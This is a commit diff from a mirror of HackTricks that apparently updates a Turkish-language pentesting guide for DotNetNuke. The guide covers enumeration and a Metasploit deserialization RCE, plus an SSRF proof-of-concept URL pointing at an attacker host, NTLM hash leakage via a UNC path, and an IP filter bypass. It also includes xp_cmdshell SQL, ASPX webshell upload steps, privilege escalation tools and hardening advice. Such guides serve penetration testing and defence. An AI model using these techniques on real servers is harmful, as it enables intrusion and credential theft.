maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/network-services-pentesting/pentesting-web/dotnetnuke-d

Browse Source
This commit is contained in:
Translator 2025-07-19 08:09:39 +00:00
parent aa20158164
commit a91fe9a97e
1 changed files with 76 additions and 21 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

97
src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md
View File

@ -4,37 +4,92 @@
## DotNetNuke (DNN)
DNN'ye **yönetici** olarak girdiğinizde RCE elde etmek kolaydır.
DNN'ye **yönetici** olarak girdiğinizde **RCE** elde etmek kolaydır, ancak son birkaç yılda bir dizi *kimlik doğrulaması yapılmamış* ve *kimlik doğrulaması sonrası* teknik yayınlanmıştır. Aşağıdaki kılavuz, hem saldırgan hem de savunma çalışmaları için en kullanışlı temel bileşenleri toplar.
## RCE
---
## Versiyon & Ortam Sayımı
### SQL Üzerinden
* *X-DNN* HTTP yanıt başlığını kontrol edin genellikle tam platform sürümünü açıklar.
* Kurulum sihirbazı, `/Install/Install.aspx?mode=install` içinde sürümü sızdırır (çok eski kurulumlarda erişilebilir).
* `/API/PersonaBar/GetStatus` (9.x) düşük ayrıcalıklı kullanıcılar için `"dnnVersion"` içeren bir JSON nesnesi döner.
* Canlı bir örnekte göreceğiniz tipik çerezler:
* `.DOTNETNUKE` ASP.NET formları kimlik doğrulama bileti.
* `DNNPersonalization` XML/serileştirilmiş kullanıcı profili verilerini içerir (eski sürümler aşağıdaki RCE'ye bakın).
**`Settings`** sayfasında bir SQL konsolu mevcuttur; burada **`xp_cmdshell`**'i etkinleştirebilir ve **işletim sistemi komutları** çalıştırabilirsiniz.
---
## Kimlik Doğrulaması Yapılmamış Sömürü
**`xp_cmdshell`**'i etkinleştirmek için bu satırları kullanın:
```sql
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
### 1. Çerez Serileştirme RCE (CVE-2017-9822 & takipleri)
*Etkilenen sürümler ≤ 9.3.0-RC*
`DNNPersonalization`, yerleşik 404 işleyicisi etkinleştirildiğinde her istekte serileştirilir. Bu nedenle, hazırlanmış XML, keyfi gadget zincirlerine ve kod yürütmeye yol açabilir.
```
Ve **"Run Script"** butonuna basarak o sQL cümlelerini çalıştırın.
Ardından, OS komutlarını çalıştırmak için aşağıdakine benzer bir şey kullanın:
```sql
xp_cmdshell 'whoami'
msf> use exploit/windows/http/dnn_cookie_deserialization_rce
msf> set RHOSTS <target>
msf> set LHOST <attacker_ip>
msf> run
```
### ASP webshell Üzerinden
Modül, yamanmış ancak hala savunmasız olan sürümler için doğru yolu otomatik olarak seçer (CVE-2018-15811/15812/18325/18326). Sömürü, 7.x9.1.x sürümlerinde **kimlik doğrulama olmadan** ve 9.2.x+ sürümlerinde *doğrulanmış* düşük ayrıcalıklı bir hesapla çalışır.
`Settings -> Security -> More -> More Security Settings` altında `Allowable File Extensions` kısmında **yeni izin verilen uzantılar ekleyebilirsiniz** ve ardından `Save` butonuna tıklayabilirsiniz.
### 2. Sunucu Tarafı İstek Sahteciliği (CVE-2025-32372)
*Etkilenen sürümler < 9.13.8 Yamanın yayımlanma tarihi Nisan 2025*
**`asp`** veya **`aspx`** ekleyin ve ardından **`/admin/file-management`** altında bir **asp webshell** olan `shell.asp` dosyasını yükleyin.
Eski `DnnImageHandler` düzeltmesinin bir atlatması, bir saldırganın sunucuyu **keyfi GET istekleri** yapmaya zorlamasını sağlar (yarı-kör SSRF). Pratik etkiler:
Sonra **`/Portals/0/shell.asp`** adresine erişerek webshell'inize ulaşabilirsiniz.
* Bulut dağıtımlarında iç port taraması / meta veri hizmeti keşfi.
* Aksi takdirde İnternet'ten güvenlik duvarıyla korunmuş olan ev sahiplerine ulaşma.
### Yetki Yükseltme
Kanıt konsepti (değiştir `TARGET` & `ATTACKER`):
```
https://TARGET/API/RemoteContentProxy?url=http://ATTACKER:8080/poc
```
İstek arka planda tetiklenir; geri çağırmalar için dinleyicinizi izleyin.
Örneğin **Potatoes** veya **PrintSpoofer** kullanarak **yetkileri yükseltebilirsiniz**.
### 3. NTLM Hash Sızıntısı UNC Yönlendirmesi ile (CVE-2025-52488)
*Etkilenen sürümler 6.0.0 9.x (< 10.0.1)*
Özel olarak hazırlanmış içerik, DNN'nin `\\attacker\share\img.png` gibi bir **UNC yolu** kullanarak bir kaynağı almaya çalışmasına neden olabilir. Windows, NTLM müzakeresini memnuniyetle gerçekleştirir ve sunucu-hesap hash'lerini saldırgana sızdırır. **10.0.1** sürümüne yükseltin veya güvenlik duvarında dışa dönük SMB'yi devre dışı bırakın.
### 4. IP Filtre Atlatma (CVE-2025-52487)
Yönetici portalı koruması için *Host/IP Filtreleri*'ne güvenen yöneticiler, **10.0.1** sürümünden önceki sürümlerin, ters proxy senaryosunda `X-Forwarded-For`'ı manipüle ederek atlatılabileceğini bilmelidir.
---
## Kimlik Doğrulama Sonrası RCE
### SQL konsolu aracılığıyla
**`Ayarlar → SQL`** altında, site veritabanına karşı sorgu çalıştırmaya olanak tanıyan yerleşik bir sorgu penceresi bulunmaktadır. Microsoft SQL Server'da **`xp_cmdshell`**'i etkinleştirip komutlar başlatabilirsiniz:
```sql
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
GO
xp_cmdshell 'whoami';
```
### ASPX webshell yükleme ile
1. **`Ayarlar → Güvenlik → Daha Fazla → Daha Fazla Güvenlik Ayarları`** kısmına gidin.
2. **İzin Verilen Dosya Uzantıları** kısmına `aspx` (veya `asp`) ekleyin ve **Kaydet** butonuna tıklayın.
3. **`/admin/file-management`** kısmına gidin ve `shell.aspx` dosyasını yükleyin.
4. Bunu **`/Portals/0/shell.aspx`** adresinde tetikleyin.
---
## Windows'ta Yetki Yükseltme
Kod yürütme **IIS AppPool\<Site>** olarak gerçekleştirildiğinde, yaygın Windows yetki yükseltme teknikleri geçerlidir. Eğer sistem savunmasızsa, şunları kullanabilirsiniz:
* **PrintSpoofer** / **SpoolFool** ile *SeImpersonatePrivilege*'i kötüye kullanın.
* *Service Accounts*'tan kaçmak için **Juicy/Sharp Potatoes** kullanın.
---
## Güçlendirme Önerileri (Mavi Takım)
* En az **9.13.9** sürümüne (SSRF atlatmasını düzeltir) veya tercihen **10.0.1** sürümüne yükseltin (IP filtreleme ve NTLM sorunları).
* Kurulumdan sonra kalan **`InstallWizard.aspx*`** dosyalarını kaldırın.
* Çıkış yapan SMB'yi (portlar 445/139) devre dışı bırakın.
* DNN içinde değil, kenar proxy'sinde güçlü *Host Filtreleri* uygulayın.
* Kullanılmıyorsa `/API/RemoteContentProxy` erişimini engelleyin.
## Referanslar
* Metasploit `dnn_cookie_deserialization_rce` modül belgeleri pratik kimlik doğrulamasız RCE detayları (GitHub).
* GitHub Güvenlik Danışmanlığı GHSA-3f7v-qx94-666m 2025 SSRF atlatma ve yamanma bilgileri.
{{#include ../../banners/hacktricks-training.md}}